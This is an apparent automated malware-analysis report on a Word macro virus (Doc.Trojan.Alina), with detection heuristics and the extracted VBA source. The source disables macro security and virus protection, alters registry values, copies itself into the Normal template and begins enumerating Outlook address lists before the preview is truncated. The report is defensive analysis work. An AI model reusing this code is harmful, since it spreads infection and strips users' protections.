MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The critical ClamAV detections indicate this is a known malicious document, specifically identified as Doc.Trojan.Alina. The VBA macros, particularly the Document_Open subroutine, are designed to execute code that modifies registry keys related to system security and owner information. The script attempts to disable macro security warnings and potentially alter persistence mechanisms, suggesting it's a downloader or part of a larger infection chain.
Heuristics 5
-
ClamAV: Doc.Trojan.Alina-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Alina-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5472 bytes |
SHA-256: 6b3d626de73322c77b29c0f2c18ff475cc9e7872a477b33daead316ed49b995c |
|||
|
Detection
ClamAV:
Doc.Trojan.Alina-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Jhuma"
Attribute VB_Base = "1Normal.Love"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Call Alina
End Sub
Private Sub Document_Open()
Call Alina
End Sub
Private Sub Alina()
On Error Resume Next
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
CustomizationContext = NormalTemplate
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Toolbars").Visible = False
Options.VirusProtection = False: Options.SaveNormalPrompt = False: Options.ConfirmConversions = False
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") <> "Fateha" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Fateha"
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") <> "Fateha/Alina/Liton" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Fateha/Alina/Liton"
End If
Set ADC1 = ActiveDocument.VBProject.VBComponents(1)
Set NDC1 = NormalTemplate.VBProject.VBComponents(1)
ExportFile1 = Application.StartupPath + "\~Alina.tmp"
ExportFile2 = Application.StartupPath + "\~Love.tmp"
If Dir(ExportFile1) = "~Alina.tmp" Then Kill ExportFile1
If Dir(ExportFile2) = "~Love.tmp" Then Kill ExportFile2
If ADC1.CodeModule.CountOfLines > 0 Then ADC1.Export (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then NDC1.Export (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For i = 1 To ADC1.CodeModule.CountOfLines: ADC1.CodeModule.DeleteLines 1: Next
End If
ADC1.CodeModule.AddFromFile (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For i = 1 To 4: ADC1.CodeModule.DeleteLines 1: Next
Else
ADC1.CodeModule.AddFromFile (ExportFile1)
For i = 1 To 4: ADC1.CodeModule.DeleteLines 1: Next: End If
If NDC1.CodeModule.CountOfLines > 0 Then
For i = 1 To NDC1.CodeModule.CountOfLines
NDC1.CodeModule.DeleteLines 1: Next
End If
NDC1.CodeModule.AddFromFile (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then
For i = 1 To 4: NDC1.CodeModule.DeleteLines 1: Next
Else
NDC1.CodeModule.AddFromFile (ExportFile2)
For i = 1 To 4: NDC1.CodeModule.DeleteLines 1: Next
End If
If NDC1.Name <> "Love" Then NDC1.Name = "Love"
If Day(Now) > 0 And Day(Now) < 8 Then
If ADC1.Name <> "Love" Then
ADC1.Name = "Love"
Application.UserAddress = "Liton" + Chr(13) + "Shibrampur" + Chr(13) + "Burichang" + Chr(13) + "Comilla"
End If
End If
If Day(Now) >= 7 And Day(Now) < 16 Then
If ADC1.Name <> "Jhuma" Then
ADC1.Name = "Jhuma"
Application.UserAddress = "Jhuma" + Chr(13) + "Shibrampur" + Chr(13) + "Burichang" + Chr(13) + "Comilla"
End If
End If
If Day(Now) >= 15 And Day(Now) < 22 Then
If ADC1.Name <> "Love" Then
ADC1.Name = "Love"
Application.UserAddress = "Fateha" + Chr(13) + "Shibrampur" + Chr(13) + "Burichang" + Chr(13) + "Comilla"
End If
End If
If Day(Now) >= 21 And Day(Now) < 31 Then
If ADC1.Name <> "Lutfur" Then
ADC1.Name = "Lutfur"
Application.UserAddress = "Lutfur" + Chr(13) + "Shibrampur" + Chr(13) + "Burichang" + Chr(13) + "Comilla"
End If
End If
Dim UDO, DMN, BUOS
Set UDO = CreateObject("Outlook.Application")
Set DMN = UDO.GetNameSpace("MAPI")
DMN.Logon "profile", "password"
For l = DMN.AddressLists.Count To 1 Step -1
Set ADB = DMN.AddressLists(l)
i = 0
Set BUO
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.